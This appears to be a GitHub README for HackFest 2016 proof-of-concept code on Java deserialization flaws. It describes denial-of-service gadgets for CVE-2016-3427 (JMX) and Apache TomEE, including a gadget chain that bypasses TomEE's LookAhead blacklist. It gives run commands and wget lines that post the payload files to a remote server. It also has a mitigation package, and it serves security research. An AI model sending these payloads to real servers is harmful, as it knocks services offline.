Skip to content
master
Switch branches/tags
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
src
 
 
 
 
 
 
 
 

Fixing the Java Serialization mess

Supporting source code for a HackFest 2016 presentation

Bonhomme Carnaval, Duke-style

Installation

mvn install

Content

POC for CVE-2016-3427

Class com.salesforce.trust.s11n.exploit.JmxClient

Tries to:

  1. Connect to the provided JMX server using the long connection string syntax
  2. Connect to the provided JMX server using the RMI connection string syntax.
  • Sends the provided user name and password as credentials.
  • Sends a Malicious Set instance as credentials, in order to cause a Denial of Service attack on the JMX server. Only works when the server runs Java 8 u 77 (or earlier)
java -cp target/hackfest-2016.jar:target/lib/commons-io-2.5.jar:target/lib/javaee-api-6.0-6.jar:target/lib/openejb-core4.7.4.jar:target/lib/openwebbeans-impl-1.2.7.jar:target/lib/openwebbeans-spi-1.2.7.jar:target/lib/serp-1.15.1.jar:target/lib/tomcat-juli-8.5.5.jar:target/lib/tomcat-tribes-8.5.5.jar com.salesforce.trust.s11n.exploit.JmxClient hostName registryPort jmxPort userName

POC for Denial of Service attack

Class com.salesforce.trust.s11n.exploit.JreOutOfMemory

Throws OutOfMemoryError when deserializingin doctored instances of various well known classes

java -cp target/hackfest-2016.jar:target/lib/commons-io-2.5.jar:target/lib/javaee-api-6.0-6.jar:target/lib/openejb-core-4.7.4.jar:target/lib/openwebbeans-impl-1.2.7.jar:target/lib/openwebbeans-spi-1.2.7.jar:target/lib/serp-1.15.1.jar:target/lib/tomcat-juli-8.5.5.jar:target/lib/tomcat-tribes-8.5.5.jar com.salesforce.trust.s11n.exploit.JreOutOfMemory

POC for Apache TomEE Denial of Service

Class com.salesforce.trust.s11n.exploit.TomeeLookAheadBypass

Generates a 'regular' DOS gadget that can be used on older versions of Apache TomEE (before LookAhead validation was added, 1.7.3 or older)

Gadget chain:

ObjectInputStream.readObject() 
  HashSet.readObject()

Usage:

Generate a binary file containing a DOS payload:

java -cp target/hackfest-2016.jar:target/lib/commons-io-2.5.jar:target/lib/javaee-api-6.0-6.jar:target/lib/openejb-core-4.7.4.jar:target/lib/openwebbeans-impl-1.2.7.jar:target/lib/openwebbeans-spi-1.2.7.jar:target/lib/serp-1.15.1.jar:target/lib/tomcat-juli-8.5.5.jar:target/lib/tomcat-tribes-8.5.5.jar com.salesforce.trust.s11n.exploit.TomeeLookAheadBypass regular

Send the file to the remote TomEE server:

wget --post-file tomee1.ser http://remote-server:8080/tomee/ejb

POC for bypassing LookAhead Mitigation in Apache TomEE version 1.7.4

Class com.salesforce.trust.s11n.exploit.TomeeLookAheadBypass can also generate a different gadget that can bypass TomEE mitigation. TomEE is secure by default, since everything is black-listed when you install it.

File conf/system.properties

Upon install, the file contains these 2 lines:

tomee.serialization.class.blacklist = *
# tomee.serialization.class.whitelist = my.package

To enable OpenEJB, we want to restrict the black list to known malicious classes, and we want to include our legitimate classes in the white list:

tomee.serialization.class.blacklist = java.util.HashSet
tomee.serialization.class.whitelist = bonhomme.Carnaval, java, org.apache

This configuration provides an adequate mitigation against the DOS attack however, it can be bypassed by this new gadget:

Gadget chain:

ObjectInputStream.readObject()
  EventImpl.readObject()
    OwbCustomObjectInputStream.readObject()
      HashSet.readObject()

Usage:

Generate a binary file containing a DOS payload (note the bypass flag):

java -cp target/hackfest-2016.jar:target/lib/commons-io-2.5.jar:target/lib/javaee-api-6.0-6.jar:target/lib/openejb-core-4.7.4.jar:target/lib/openwebbeans-impl-1.2.7.jar:target/lib/openwebbeans-spi-1.2.7.jar:target/lib/serp-1.15.1.jar:target/lib/tomcat-juli-8.5.5.jar:target/lib/tomcat-tribes-8.5.5.jar com.salesforce.trust.s11n.exploit.TomeeLookAheadBypass bypass

Send the file to the remote TomEE server:

wget --post-file tomee2.ser http://remote-server:8080/tomee/ejb

POC for LookAhead Method Blacklist

Input validation flow

Flow chart

Code

Package com.salesforce.trust.s11n.mitigation

Usage:

mvn test

About

Supporting source code for a HackFest 2016 presentation

Resources

Releases

No releases published

Packages

No packages published

Languages